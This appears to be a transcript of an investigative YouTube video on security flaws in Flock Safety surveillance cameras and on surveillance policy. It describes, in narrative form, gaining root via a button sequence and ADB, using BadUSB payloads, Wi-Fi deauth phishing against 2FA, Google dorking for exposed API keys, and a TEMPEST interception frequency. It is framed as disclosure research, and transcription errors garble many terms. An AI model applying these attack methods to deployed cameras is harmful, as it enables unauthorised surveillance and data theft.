Waiting..
Auto Scroll
Sync
Top
Bottom
Select text to annotate, Click play in YouTube to begin
You may remember me from this video where I told you about 40,000 of these things that your tax dollars pay for that are tracking your every move and repurposing data collected about you every time that you drive past them. Upon further investigation, it turns out that there are over 80,000 of them. And um, we got some and we hacked them. You can press a button a few times on the back of these cameras and within a few minutes, turn them into your own personal spy device or malware host or honeypot that steals people's login credentials
or a cryptocurrency miner, whatever you want, really. Or alternatively, how you can point an antenna at them and decode the video stream using a technique used by the CIA during the Cold War. Or how another researcher found a Google search phrase that had the capabilities of showing you the real-time location of these cameras and police patrol cars. This isn't clickbait or an exaggerated claim with no payoff. Just the other day, weeks before this video will be released, US senators and representatives drafted an official letter to open an investigation that highlights the national security risks associated with our findings.
And in this video, I'm going to show you exactly how they work and even demonstrate them to journalists. No fucking word! And finally, we're going to take a deep data dive into the efficacy misinformation and straight up lies surrounding some private surveillance startups. And we're going to use that momentum to push for protocols and legislation that actually makes you safer. Wow, that's a lot for a YouTube video. The meat and potatoes of this video will be mostly in parody with John Gaines' ex-White Paper, and that's linked in the description below.
Many of these vulnerabilities were recently published with the national vulnerability database or are in the process of publication. And to prevent the average viewer from getting lost or falling asleep, I'm going to keep many of the formalities and extensive details to a minimum. But if you find yourself wanting more details at any time in this video, just check the description for a whole bunch of links. Welcome to the world of responsible disclosure. And while I'm up here, let me tell you that to the best of my knowledge, any of the cameras or hardware seen in this video were acquired legally.
I have not shared or redistributed any of the data on them, and as long as they are in my possession, they will not be placed into the wild. At no point in time, have I knowingly accessed or interfered with any server or service related to or owned by Flox Safety? There is a chance that all the devices that you see in this video or all the devices that we have acquired from multiple different sources are unique and do not have the same hardware or software that the devices in the wild have. I have no idea how or why that would be the case, but it is technically a possibility.
And finally, at the time of me recording this, there are 47 security issues covered with the vast majority listed in the white paper. In this video, I'm going to be showing you six of them. Over the last summer, when doing research for my first video on this topic, I started poking around to see if anyone had done an independent audit of Flox Safety or related services. This naturally led me to the Darkweb, where I have access to some semi-private communities dedicated to hacking and open source intelligence.
Some of these communities have well-organized marketplaces for breached data, credentials, exploits and all that stuff. And that is where I found this. Please excuse the poor English translation, but these were law enforcement Flox Safety accounts for sale with escrow protection by a reputable vendor. And a few days later, the listings were removed in a way that suggested that someone had bought them. Not long after that, I got in touch with the professional security researcher regarding other things on this list and what he had known.
He found something very similar on the Darkweb. So in the cyber industry, there are things called access brokers. And some people specialize in government agencies or maybe local law enforcement. I started digging more to find out where these accounts could have come from. Were they bought or stolen off of a police officer or a flock and ploy? Or just maybe Flox Safety had some security vulnerabilities? The most significant and troublesome and mind-boggling vulnerability on this list was discovered nearly a year ago.
The late 2024, that stumbled on a rabbit hole, and then probably a few nights later. Was messing with the buttons and the dipswitch and then was able to figure out how to get a shell on it. Yeah, so I'm John Gaines at Gaines. Professionally, I've been in the offensive security field for over a decade. Obtaining shell on a device means that you can remote control it, fix, dilatrate data, and escalate privileges, which is exactly what John did. As detailed on John's blog and formally published paper,
John had found a user named Cajure on social media who was trying to recreate some of the disclosures. He reported that by merely pressing the button on a device in a particular sequence on a Flox Safety camera, a wireless access point is created. Hey partner, don't do any of this stuff unless you can legally acquire a Flox Safety camera. If you do this to one of the 80,000 all over the US of A, you'll be put in the clink.
First thing you're going to want to do is go ahead and press the button to turn on that police camera. Then press the button on the back a number of times I can't disclose in this video. There she is. The Flox Wireless Access Point. Go on and connect. Send a command to enable ADB. Connect. And now you can connect to the Flox Safety device and access its data.
Or install whatever the hell you want on it. Have fun. This along with John's previous discoveries are encapsulated in an easy-to-use tool that he made so even a novice user could obtain full control of the camera. We let George Cheedy from the Guardian do the honors. The longest part actually is waiting for the hotspots to turn on. I'm realistically in about five seconds. And in fact, with the computer box, you don't need to hit the buttons because the USB-C ports are exposed.
So you can just plug it in a rubber duckie and then walk away. A rubber duckie, sometimes referred to as a bad USB, is a USB drive that a computer or device detects as a USB keyboard and then executes scripts called payloads. One can make a device like this for as little as $5. This quite literally raises the limit of how one could use Flox Safety devices to their imagination. You can clone or decompile the apps. You could send the video stream data to a remote server. You could use it as a botnet client from malware.
You could have it capture Wi-Fi handshake credentials and do middleman or honeypot attacks. Or replace or modify captured footage or images. And if that is the case, this could bring into question the integrity of the data being used as admissible evidence in court, like in general. Unless of course a prosecutor could prove that a security breach wasn't detected. And about that. The apps that are installed that are custom of the vendor all have debug enabled,
which on these types of devices, on inter-rate devices, means that you can pause them in runtime and modify the memory, right? Which gives you system injection. System can write properties. And in this case, there's one that you can modify. A clean up script that is ran as root. You can consider to either wireless RCE or a gated wireless RCE that goes from no access to root, which is the worst case. This means that malicious code can be installed and executed outside of the operating system.
So like when you first turn on a computer and see the bioscreen where the system does its little self-check, it could exist right there, acting as a superior to Windows or iOS or whatever it is that you're booting into. Multi-factor authentication or two-factor authentication or two-step verification is part of our daily lives. We use it when we log in everything from Gmail to TikTok to our banks and nearly everything in between. But not all 2FA is equal.
And different types have their own strengths and weaknesses. For example, some 2FA simply pop up on your phone or your desktop and ask you if you've just logged in from a certain device. In which you can approve or decline the new device. This is an excellent security protocol if you're sitting at home in Kansas and see that somebody from Bangladesh just used your password. But if I'm sitting in your driveway in Kansas or especially if I'm using your Wi-Fi using a device like this,
I can clone your Wi-Fi signal and then send a deauthorization or de-auth signal to your device's mac address. Either you will notice this and try to reconnect or your computer or phone will automatically reconnect. And now you'd be accessing your own network through my device. I could use a script to clone the login page of whatever credentials I'm trying to get and then feed it to you, capture in your session and depending on the service, your username and password.
Then as expected, you would get a 2-step verification asking you if you just logged in and you would say yes, granting me access. This means that when it comes to credentials like this, even with 2FA or MFA, a police surveillance company's security can only be as good as the least security-minded person with access to that system. If you're wondering how low this security bar can go with clients, you'll be disappointed to know that Fox Safety doesn't require 2-factor authentication with some police departments.
Yes, you heard that right. The security process you go through when you log into Disney Plus is just too much to ask some police departments to do when accessing confidential information and the location of, in some cases, virtually everyone. When I first found this out, I simply couldn't believe it. And neither could US Senator Wyden's team, which is why it's among the issues leading to a request for the FDC to open an investigation into the company on the grounds of national security. Fortunately, there's a super easy solution to this, say the USB or NFC authenticator.
It costs as little as $10 and you just plug it in or wave it in front of your device for the second layer of authentication. And if this is too much hassle for an able-bodied police officer or employee to use, then maybe they shouldn't have access to secure information. It's really frustrating to spend this much time talking about a problem when a very simple, in common sense, solution to that problem has existed since day one. A concerning amount of hard-coded information is stored inside Flux safety cameras,
and we'll hear all about it in the next vulnerabilities on this list. But within this information is a list of Wi-Fi network names. So I set up a dummy network with one of these Wi-Fi names. Then, when removing the SIM card or when the device couldn't find an LTE signal, some of our Flux safety cameras happily connected to the dummy network and routed upstream traffic through it. Others seemingly prioritized my dummy network by default, regardless of if it had a SIM card in it or not. So I captured the P-Capt data being transmitted from one of these cameras for a little while
and analyzed it with wire shark and unblock, which is an open source extraction suite. And sure enough, there were clear text credentials in the data. These exact vulnerabilities were originally disclosed by John in April, another in September, and with another pending. This attack requires knowing the name or credentials of the Wi-Fi networks the camera is looking for. But what concerns me more is that this information wasn't in an encrypted upstream to begin with, which means that by using a professional grade SDR or IMSI catcher,
which is more or less a DIY stingray device, a malicious hacker could just hijack the LTE connection and then do the exact same thing without needing to know these network names or even being physically near the camera. This could also allow a more modern version of a tempest attack, which I'll demonstrate in a few minutes. And that's where a hacker could decode the MotionJPEG video stream. I actually tried to accomplish this as I love puzzles. But unfortunately, TimeForce made a choose between decoding the pixel sequence
or finishing this video. And here we are. When I recreated John's research on these devices, as previously shown, it was as clear to me as it was to John when he first discovered it that they inadequately protected credentials, API keys, passwords, and more. As I mentioned, the Gainsec blog and the papers have a lot more details on this for the technically minded, but I'm going to use the segment to talk about some of the other troubling things that were found stored in the camera. On Fox Safety's website,
it is stated that they do not capture or record data of people, but only vehicles. They also state that data and footage is encrypted throughout the entire life cycle, and that data is automatically removed from devices after seven days. Speaking for myself when I recreated John's research across multiple devices, I confirmed exactly what he was seeing. If Fox Safety's cameras in the wild are operating like the ones we researched,
this would be a clear contradiction to their statements. Firstly, when I moved in front of the camera, the radar module triggered the camera module to take a picture of me. Then the onboard AI looked for a license plate and didn't find one, but it stored the image anyway to a separate folder. Now this doesn't seem to target people, it will also take a picture of my hand if I move in front of the lens or a picture of my desk if I move the device. But what I observed were the devices intentionally saving the footage,
not erasing it. Secondly, throughout the entire process of verifying John's research, I didn't crack or decrypt a single thing. Any of the information, footage, or data that you see or hear about in this video was unencrypted at runtime. And finally, when going through the files and temp folders of the Falcon cameras, we absolutely found images older than seven days. In fact, John found stored images that were captured when the camera was triggered inside the
factory where the device was made. So hypothetically, this suggests that if you had a camera deployed and pointed at your front door, one could access this data and figure out when you entered or exited your house. For about as long as modern search engines have existed, so is dorking. So googling looks like this and dorking looks like this. And if you're really well versed in dorking,
you'll start finding things that weren't necessarily intended to be public. I'm a pretty solid dorker and I use it constantly for researching videos like this one. Josh, however, is a legitimate expert at dorking. I'm Josh Remykel. I'm a technology obsessive and I founded next into AI, which is a all-source intelligence firm focusing in privacy and personal cybersecurity. This is the exact Google search I use to find and expose Flux safety demo site,
if you have a system trace his cars, maps patrol vehicles, and consume build full investigation profiles on people. At first glance, it was a UI demo site meant to just show off how cool their buttons look. As I looked deeper, it contained 5,000 lines of source code for a search platform. Embaried in the code was a live API key. And an API stands for application programming interface, which basically allows a computer to contact another computer without having to deal with all the
clunky things like user interfaces and buttons. The confidentiality of API keys and tokens like this are sometimes more important than things like user names and passwords because in many cases, the token alone grants you the same access but without front and security measures like capture or two-step verification. In the head access to over 50 private layers, that I didn't dare touch because I'm too handsome for prism. I used open source intelligence to see what data is stored in RGS. Let me show you some of the things I found in the police
departments and Flux safety are storing on RGS. This Flux safety map is obviously a demo, but it shows that they'd store registration data. So names, emails, how many cameras, and a field to attach files, whatever that may be. Carrollton Police Department, this is no good, exposed API key may have earned this access to track live patrol car locations. Also, on the naughty list is a roar Colorado or maybe Flux safety. I don't actually know who owns this map.
It's Flux safety. Leaking another RGS layer with officers names, phone numbers, emails, and even their expected patrol areas. The worst one coming out of Dallas, Texas, a map layer with 6,000 records of hot list alerts containing license plates, the reasons why they're on that list, the exact location detected, the camera that caught them, and the time that they went by. Anyone could Google find this map and trace these people's movement patterns for five months.
Also, going to note the reason category has someone in there for just suspect, and a bunch of others literally have no reason in our blank. So let's back it up for a second. If you call 911 and the dispatcher deems an emergency requiring police, most modern police cars have a GPS module installed that reports back to dispatch. That way, they can efficiently contact the police nearest the event and expedite the response time. Flux safety and many of its clients use third-party services that makes sense of this constant
stream of data, and all of that data is handled with an API. Just a few weeks ago, two security researchers, Alexa Feminawa and James Zhang, wrote a report discovering that ARC GIS had been compromised by a Chinese state-sponsored hacking group called Flex Typhoon. The report from Info Security Magazine states the hackers allegedly targeted a legitimate public-facing ARC GIS application. This is software that allows organizations to manage spatial data for disaster
recovery, emergency management, and other critical functions. This is just a very recent example of what could be compromised with sensitive API information for geospatial platforms. This is probably in real-world scenarios the least concerning vulnerability in this video, but one of the most fascinating ones, and very few consumer or security cameras, displays, or network manufacturers have the means or know how to test for it. At some level, this device
that you're watching this video on is leaking non-ionizing electromagnetic radiation, and if the R word is unsettling, non-ionizing means no DNA damage. Phones leak it, monitors leak it, microphones leak it, camera modules leak it, most modern electronic devices leak it. But some of these leaking electromagnetic waves are resonating and modulating in parity with the signal, and if you can isolate the resonating frequencies you can, with a lot of trial and error,
decode the signal, or in other words, spy on the device. The Tempest attack is something that the CIA and NSA used and experimented with ever since World War II, which is how it got its cool sounding name. Back when we all used CRT televisions and monitors, there was generally a whole lot more RF leakage, so it was a much bigger risk to national security. These days, a practical Tempest attack would involve some time finding and decoding the signal, and then placing an RF bug
on or near the source, which could transmit the data remotely. You need a software to find radio with a lot of bandwidth, RF probes, a directional antenna, and a spectrum analyzer. On the newer Flux satellite cameras, I noticed that there was an unusual amount of RF leakage coming from the camera module itself, the proprietary coaxial port, and the eight pin didn't port on the back. Initially using an RF probing kit and a siloscope, a spectrum analyzer,
and a hack RF, I was able to isolate a few various ranges of modulated signals. Then I brought the camera into another room to rule out localized interference and tested these signals as well as common integer quotients of those frequencies. Using an RF probe, I found an exploitable leak between 592 and 594 megahertz. Then using a periodic log antenna and a 20-despel load noise amplifier, I was able to point the RF gun at the device as far as 6 feet away and make out what the camera
was capturing. In this case, me. Obviously the quality and lack of color leaves a lot to be desired, but that's just because the software defined radio I was using to pick this up just didn't have the bandwidth for that kind of quality. If someone were to use a professional grade multi-channel SDR board with higher resolution sample rates, the quality of the tempest to tech output can be nearly as good as its source. But due to the high cost of equipment and the knowledge and time required
to execute an attack like this, most consumer device manufacturers and owners do not need to be super worried about this. However, if a device is being used for something related to national security, government use or public surveillance, this absolutely needs to be protected against. This is just my opinion here, but most of these things are entirely preventable and the result of prioritizing growth over painfully obvious industry standard security measures like
multi-factor authentication. Another really obvious low-hanging fruit here is using mobile phone operating systems and hardware for a government surveillance camera. The Falcon, the Sparrow, and likely Flex LPR devices or the cameras you most commonly see all over the country were running Android Things 8 or 8.1 which was discontinued in 2021 and that includes security updates. At this time, there are over 900 published vulnerabilities for the SOS. Like, someone please
explain to me why there are even cameras in the wild recording public activity that aren't even running on supported software. If you're a phone or computer or home security system, stop being supported and you understood how bad this could make your life, you'd probably be inclined to throw them in the garbage. The way this is supposed to work is when you discover a vulnerability, you attempt to reach out to the company and you give them a 90-day window to release a patch.
No shout-out, reward, compensation, or bounty is required, however, after those 90 days pass, the discoverer can then post a detailed write-up. Alternatively, some go the bug bounty route where you report it and get a monetary or reputational reward. However, as explained by John and Josh, this route has commonly started to include non-disclosure agreements. This means that even if the company decides not to pay a reward, the discoverer cannot legally disclose the issue publicly.
So they did offer me a bug bounty. It wasn't very specific and included an NDA pride in knowing anything more. I don't think you're going to improve cybersecurity as a whole. Do not talk to me about it. Early February reached out. I just closed, I don't want to say 7 or 12 vulnerabilities for the light-sweight reader in the gunshot detection. They were spotted within like a day and a half. And immediately asked for a video chat, which I bled, you know, talking about joint PR statements and
so on and so forth. What ended up happening was they released a PR statement about a month and a half before the three months ended, so it was pretty fairly quickly without telling me, without referencing me or referencing the issues that I ended up publishing. They also never gave me any confirmation that anything was fixed. There's something really unnerving about going on record with legislators or media and talking about national security. I don't fully understand what defines a threat to
national security and it seems like the type of topic where you don't want to make any mistakes. So I just didn't mention it and kept that term out of my mouth and I just provided our research to those who could. And according to Oregon Senator Wyden and Illinois representative Krishna Morthy, well in their words, Flock has unnecessarily exposed Americans' sensitive personal data to theft by hackers and foreign spies. Part of my research was trying to figure out just how effective
the adoption of Flock safety and similar ALPR services have been at reducing crime rates or increasing crime clearance rates and this is a deceptively difficult task. For example, let's do what most people concernately do these days and ask Google and let AI answer it for us. Well hey there you have it. Let's maybe look at those actual sources though. By the way, I want to take a moment to congratulate Flock safety on their search engine optimization skills. It's so good
that even services that only exist to help companies improve their SEO are like, bro, sorry, it's literally impossible to improve beyond your early talent. This means that whenever you want to find information about Flock safety or ALPRs or police cameras, Flock is going to be the most prominent and influential force in your initial results and subsequently so will the AI assistance answer. More on that Pelscape in future video. But hey look some studies. Let's check them out.
Okay so only two of these studies took place after Flock safety was even incorporated and they tell us nothing about the efficacy of surveillance or data collection. Flock safety's website claims that 10% of all crime in America is solved using their services which is a pretty impressive thing to brag about. However the source that they cite this claim with was a research paper created by two Flock safety employees that doesn't really outline regional analysis. In other words crime has
been dropping nationally in America since 2021, even in the last year. The first thing that I personally would want to look for is a crime rate and clearance comparison between cities that use Flock safety services and cities that do not. And when you do it that way, it's extremely difficult to find any meaningful changes related to surveillance technology in general. But there have been other studies not directly related to the surveillance industry. The National Policing Institute did
a multi-site evaluation and said that license plate readers can improve public safety but the technology's impact depends on its implementation. It could just be me but this sounds quite a bit different than what Flock CEO is saying. Over 5,000 cities leveraged Flock to solve north of 14% of all crimes in America. But Flock's story is an awareness story. We can now rest assured that if a crime happens in South Downtown, it will be solved. It wasn't.
In 2023, the Berkeley Police Accountability Board did some data diving and found that ALPRs and other California communities were sometimes more correlated with increases in vehicle theft and the lower crime clearance rates. In the case of Bakersfield, California, it was only after ALPRs were installed when the city rose to have the highest motor vehicle theft rate in the United States. The board also noticed that Flock's safety head claimed their services were responsible for a 33%
decrease in motor vehicle thefts in Bakaville, California, but were citing data from years before the cameras were even installed. Which brings us to Oakland, California. And in full transparency, I've been informally consulting with and sharing some of this research with their city council, who had just delayed a vote on a 2.25 million dollar expansion to its Flock's safety network. Flock's safety's public website claims that their services have helped Oakland's violent crime clearance rate rise by 11%. Not bad. Well, actually kind of bad because they failed to mention
that violent crime decreased by 19% in that period, which is on par with the FBI crime stats for the entire country. They also conveniently failed to mention that in 2023, Oakland had a violent crime clearance rate of 3%. And that was later acknowledged as an error by the police department themselves. And this was a pretty big news story last year. And the Oakland Police Department were the ones to acknowledge and confirm the error in the first place. So how are so many cities like
this failing to call bullshit on these types of claims that may result in millions of tax hours being spent on these services? This is what I keep running into again and again when researching the efficacy of police surveillance technology. A private business will cite statistics that are often misleading and somehow nobody from these cities or police departments seem to have validated the information quoted in the sales pitches. So all of this aside, even if we're not considering all of these questionable data sources
in marketing, sociology is an incredibly chaotic field of study. One that typically requires decades of adeptly sourced data to accurately suggest whether a technology or a policy change reduces crime. For decades, we've been trying to figure out if an increase in police can even reduce crime. So at the very least, there should be an independent robust meta-analysis to figure out how effective private surveillance and data sharing is before we take money away from other
resources to pay for it, right? And without getting too philosophical here, it is worth considering for a second that catching people committing crimes is very different than total anti-social or criminal events. Like a thief or a serial killer or a drug dealer or a drug addict is not going to see a bunch of police cameras and then just tap out from crime and become a plumber, they're just going to commit crimes in a more obfuscated way, which more often than not complicates the process
of finding a reformative solution. By the way, what an exhausting amount of sociology studies have figured out over the last 50 years is that high levels of surveillance drastically decrease as well being, morale, and even workplace productivity. If you think about that for a moment, it shouldn't really surprise anyone. If you have a job where you think your superiors are constantly watching you and judging your every move, you'll be concerned with appearing to be productive instead of warning and developing your skills at your natural speed. Or consider this recent study that
strongly suggests that high levels of surveillance causes a steep decline in voluntary visual processing, meaning that it quite literally impairs the brain's ability to process and recognize human faces. And once again, this is one of those things that you hear and you're like, what? But when you think about it, it's not all that surprising. When you feel like you're in an environment where you are intrinsically not trusted, you're going to be far less likely to make friendly or meaningful
social connections with others. And I'm sorry, but that just doesn't sound anything like a safe environment to me, and that's on top of an exhaustive amount of studies outlining exactly how and why increased surveillance decreases well being in mental health. But some people seemingly only read the studies conducted by companies trying to sell them something. Meet Mike Johnston, the Mayor of Denver. At first it seemed like he had the same careful agnosticism above Fox safety cameras that many researchers have. Our flat cameras are shut off
to every federal agency, everyone outside the state of Colorado, everyone outside the sitting county Denver, and no one can access them other than Denver Police Department officers. You could interpret all of the research that I showed you in this video however you like, but the way I interpreted it was that it technically demonstrated and proved that statement to be false. But guys, don't worry about this. Could a federal law enforcement agency use this database to
track someone down on a nice hold and arrest them? No, because the system was not designed to do that. In just over a year of data of usage of Denver's Fox Safety Services, queries openly admitting to be used for immigration services amounted to over 1,800. Mike even warns us of the grave dangers of cutting this data off from external communities. I want to be clear that this is a risk on public
safety. If you have someone that commits a crime in Lakewood and flees into Denver, they will not be able to find that person in Denver. We had a trans woman who was kidnapped and murdered, picked up in Denver, murdered in Lakewood. We solved that crime because Denver and Lakewood could talk to each other across a flock camera database. Except that didn't happen at all. He's referring to the death of Jack's grafting, which was not a salvage murder. Jack's mother was more than happy to speak
her mind about this. I'm shocked and appalled that a public official would use my daughter and claim that flock had anything to do with her fight being found. Fortunately as a result of all of this bullshit and citizen backlash, the Denver City Council overwhelmingly voted to not renew the flock safety contract. And in their council letter on the issue, they went as far as calling out
flock safety's ethics and credibility. And I quote, we do not believe that the city and county of Denver should continue doing business with a company that has demonstrated such disregard for honesty and accountability. Whoa, now hold on. Before you celebrate your renewal of faith and humanity, Mayor Mike Johnson's side stepped to city council and signed the flock safety contract anyway, which council members are now calling a backroom deal with a known bad actor. And all of this should
happen just in time for police to drive out from Columbine Valley, Colorado to knock on a woman's door in Denver with a summons wrongfully accusing her of stealing a package off of someone's porch. Any guesses on what technology they're citing as evidence? Floch cameras. You know, we have cameras in that town. You can't get a breath of fresh air in or out of that place without us knowing correct? To be fair, that seems like a pretty safe prison city. While the officer refused to look at the overwhelming dash cam porch camera and Google Maps
examinating the woman, fortunately, the police chief eventually did. But this makes one ponder. What's the result when this happens to a 19 year old black dude? Notably, this year, people and communities across the United States have been increasingly concerned about or opposed to the rapid expansion of private surveillance in their communities. A lot of people have been noticing more and more of these little black cameras with the solar panels and just assume that they were innocently monitoring traffic flow or maybe giving a dispatcher a better idea of
who or what to send to deal with an accident. But now they're finding out what they do and what they're capable of doing and a lot of people are just like, yeah, f*** that. And now every few days, I hear about another city pushing back and deciding to take down floch safety cameras. However, in some cases, a city formally deciding that they no longer want floch safety services or cameras somehow doesn't result in them going away. After finding out that ice was using their cameras without their
knowledge or consent, the Chicago suburb of Evanston decided that they wanted them removed. So floch safety then reinstalled most of them. And since you can't own a floch safety device only lease it, the city or police department would be handling and potentially damaging private property when removing them. So now, Evanston Illinois is spending tax dollars on legal expenses for cease-send assist letters and covering the cameras with plastic sheeting to protect residents from being tracked by them. But my previous video about this topic came way too late. Organizations like
Lucy Parsons Labs and Sassy South have been pushing back for years. Another great example, Will Freeman, who's a software engineer who started deflock last year. Around a year ago, I was taking on a road trip from Seattle to Huntsville, Alabama. And I ran into so many of these along the way and these like really small towns. I wanted to do what most cities weren't doing and actually tell people what these things are, where they are and how many they are. Will is more or
less simply trying to keep a map and publicly accessible record of deployed cameras. I think this is something that both local governments and floch safety should already be doing and you probably have a hard time finding anyone who disagrees with that, right? I never gotten a season to assist before. But luckily before this even happened, the EFF reached out via email and just said that they were there. They didn't need anything. So
I reached out to them and then they were able to send a response, actually two responses because they're lawyers and another another letterback saying basically like we don't care. We think you're wrong anyway. Flox season to assist here was pertaining to trademark, which in my opinion seems like an absurdly frivolous way to try and bully someone to take down a website that simply provides the public with some transparency about surveillance that their tax dollars pay for. But Garrett Langley,
the founder and CEO of Flox Safety, doesn't see it this way. And then unfortunately there's terrorist organizations like deflock, whose primary motivation is chaos. They are closer to Antifa than they are anything else. I mean, where do you even begin with this? Firstly, if you're going to live action roleplay the dark night, at least watch the movie up until the point where Lucius Fox and Batman both agreed that their mass surveillance system is grossly and ethical and intentionally destroy it. Secondly, using buzzwords like Antifa doesn't exactly invite
rational or good faith discourse. You trolled this guy with legal demands and then publicly accused him of being a terrorist, but the key takeaway of this interview for me. But that's why we have a democratically elected process. Right? Like, we're not forcing flock on anyone. Let me make something clear. My little farm here is not exactly in a dense urban environment. We don't even have sidewalks. I literally cannot leave my neighborhood to go get groceries or ship out a package without passing a flock camera and having my activities logged into a database that is
shared to a much larger regional database. I am not allowed to know who has access to this information. The people sharing my local information regionally or even nationally most likely do not know exactly who has access to it. I didn't sign up for flock safety. I never consented to it. I've never had an opportunity to vote for it. I do not have the option to opt out of it. And then after researching and taking some pictures of the cameras that are constantly photographing me and seeking more information about them, I coincidentally get cops in my driveway, waking my
family members up, asking weird questions and freaking my neighbors out. Now I'm shelving educational video projects to pay attorneys and constantly have to make sure someone is around to take care of my animals because every day I'm not sure if I'm going to be fucking detained for literally not breaking a single law. We're not forcing flock and anyone lacks so much perspective in his pact with so much delusion and cognitive dissonance that even Forbes senior editor can't manage to keep a straight face through the sentence. We're not forcing flock on anyone.
Hey, Colin. Hey, help you. Here are just a few of the many strange events regularly happening at Ben's home and lab this month that may or may not be associated with this video. That's a maybe in like what the fuck are you doing? What are we all the neighbors are freaked out? I think it's just a recording video. Would it be legal if I took my
fuck out? Let's just be honest for a second and state the obvious. These cameras aren't exactly a little impenetrable fortresses. Their plastic android cameras and compute boxes mounted seven feet off the ground with hose clamps. And in many cases they can be found in semi-rural areas where one has trouble finding a stop sign that doesn't have bullet holes in it. And there are a whole lot of people who absolutely despise these cameras but we're being patient and we're taking the high
road. We're asking our local state and federal governments to not throw our tax dollars at a fast scaling tech startup before adequately researching the risks and rewards. And especially before vetting the hardware and software services that are harvesting our information. It might seem like my research and videos on this topic are anti-flock. And to some degree because of delusional shit like this, they are. But we also shouldn't deny that there's a long list of companies trying
everything they can to take Fox 80's place on the leaderboard. If somehow we all woke up tomorrow morning and Fox ceased to exist, another startup would quickly be in their place promising to help police self-crime and exchange for taxpayer money. But do you want to know what I find absolutely outrageous that over 80,000 surveillance cameras were installed all over the country. And I'm not aware of a single public audit of the devices, the services, or the technology. And if there was,
they would have found the exact same low-hanging fruit detailed in this video. And that's the big difference here that we need to constantly be acknowledging. Your government supposedly exists to keep order, security, and safety for society. Fox safety exists to make money. They're not a charity, they're a $7.5 billion tech startup reportedly preparing to launch an IPO. And by far, their biggest investor is in recent Horowitz. So this is pretty simple stuff. Should we trust civilian data with
the company who is partially controlled and funded by in recent Horowitz? Well, let's see, Mark in recent was a board member of Facebook during the Cambridge Analytica scandal and was one of the people on the hook for over eight billion dollars in privacy violation settlement. A16z Portfolio Company Coinbase exposed sensitive information of 69,000 customers. Even the A16z website itself had flaws allowing hackers to put sensitive information about their portfolio companies. Ah, there's so much. What else? Lend up was shut down in 2021 for repeatedly
breaking the law and cheating its own customers. Tell us to see their customers and thinking that they were putting their money into FDIC and shared savings accounts. Wise was involved in funding Hamas and pig butchering crypto schemes. But no, I'm sure this time it'll be fine. I'm so sure that it'll be fine that I'm not even going to look under the hood. I have an idea. And it's a pretty obvious conclusion to all of this. And I think it's an idea that anyone watching this can agree on. Well, except for maybe the people invested in government
surveillance. But hear me out. If a private company wants to offer services to the government that are related to national security, public surveillance, or processing data that will be used within the public justice system, they will have to pay an application fee and provide access to any hardware or software that they intend to put in public. This application fee will hire a small team of independent security researchers who are vetted and unaffiliated with the services or products
that they're researching. This team will essentially do exactly what we did in this video, but with adequate resources. If problems are discovered, CBEs will be published and responsible disclosure will be followed, which would presumably help the company tighten things up without having to pay bug bounties. And if no major problems are discovered, then the company will receive a rating that will be valid for one year until they have to renew their vendor license and get a less intensive inspection. This is not too much to ask. You can't open a hair salon without a
license. You can't keep a McDonald's open without a health inspection. You can't legally drive a car past a flock safety camera without taking a routine driver's test and having a vehicle that passes basic safety requirements. This is an apolitical, common-sense solution to a really big problem. I'm going to formally propose it to legislators I'm in contact with, and I think it'd be really useful if you, yeah, you, wrote, emailed, and called your representative senators and state attorney generals proposing the same thing. I don't believe that humans aren't transically right or left,
but if you haven't noticed, finding objectivity in the media right now is like being a grasshopper stuck in the middle of a football field. I'm very familiar with ground news. I've been a paying customer on the service for years. It's an app and a website that collects news articles from around the world and organizes them by political bias, reliability, and potential conflicts of interest, such as media ownership. Ground news themselves are independently owned and funded by subscribers like myself, and they're vetted by three different independent news monitoring organizations.
So here's an example. Here we have this AI-generated drone illustration hovering over protesters, and it's warning them that they're being monitored by predator drones orbiting over Los Angeles. Yes, orbiting. I suppose if people could believe that the earth is flat, then people could believe that LA is a celestial body. Okay, so I head over to ground news to see if this is even a thing and CUB-Blam, it is. Then you can see these bias filters, which you could use as a sort of political compass or an amusing joyride to see how cooked we all are. I can easily see who owns
the media source, and then their factuality score from three different news monitoring organizations. And then if I'm feeling brave, I can use the blind spot feature to see the news stories that my own personal internet echo chamber isn't showing me. And as usual, when I have a sponsor on this channel, any profit from that sponsorship will go to UNICEF Ukraine. Russia is actively targeting the Ukraine's infrastructure and nothing spoils the holidays like knowing that you didn't help children freezing to death. If you're into this, you could subscribe to get 40% off the vantage
plan by scanning this QR code or using my link, ground.news-forward-slash-ben. In my last video on this, I talked a lot about ethics. I talked a lot about how ALPRs and AI cameras could be misused and how they already have been misused. I outlined how I believe it easily violates Americans' fourth amendment rights. And here is some feel-good information that you probably don't get to hear much of in 2025. This is a completely nonpartisan issue.
One could use this type of surveillance to track people that ice intends to capture or deport. Or one could use this type of surveillance to track ice to sabotage and warn people about raids. It could be used to track a woman leaving her state to get an abortion. It could also be used to track someone driving around during a lockdown during a pandemic. There is no civilian anywhere, who is always 100% aligned with their government throughout their entire life. If mass surveillance
sounds good to you today, then it probably wouldn't have sounded good to you five years ago, and I guarantee you that it won't sound good to you at some point in the future. This isn't a right-versal-left thing, or a Republican-verse Democrat thing, or an empathy-versal-logic thing. It's an authoritarian-vers individual thing. Privacy is a form of power that increases your control over your own destiny. And right now, you're at a junction where you're made to be so scared of
your neighbors that you might be willing to give up that power. Or you can simply say no. I refuse to pay for my every movement to be tracked by my government, the Re4-profit company, that hasn't even been adequately vetted to protect my security. But for this to stop, you need to use your voice and you need to get involved. There are links in the description to show you exactly how to do that. This video is by far the most time-consuming, impactful,
expensive, and collaborative product I've done on this channel, or with this nonprofit. Obviously, it would have not been possible without John Gasex incredible in thorough research, or Joshua Michael's determination, ethics, and skill set. If you work in government and listen to that part a few minutes ago about setting up a research team to verify technology vendors courting for government contracts, both John and Josh's websites with their contact information can be found in the description. I also need to thank the exhaustive level of work from Ed Vogel,
Sassy, Lucy Parsons Labs, my legal counsel, Albert Sowers, LLP, and those incredibly brave individuals who trusted me with information that could get them in a lot of trouble for sharing. They put the safety and common good of society above their own interests, and I want to acknowledge how meaningful and frankly beautiful that is. I want to thank all the legislators, police officers, and commissioners who, instead of calling me a terrorist, participated in a civil discussion
on how to serve their communities better. But most of all, I want to thank my Patreon members. It might not seem like it, but this video and the associated research, the fact-checking, the legal counsel costs tens of thousands of dollars. And quite literally, without the support of my Patreon members, independent research like this would be impossible for me. If you want to join that community and pitch in for more content like this, as well as a whole lot of dorky and sciencey and artsy content, and be part of incredible discord community and forum full of
like-minded folks and a monthly songwriting challenge, you can join for as little as one dollar. Thanks for watching. Keep creating. Bye.
End of transcript

This page is an adaptation of Dan Whaley's DropDoc web application.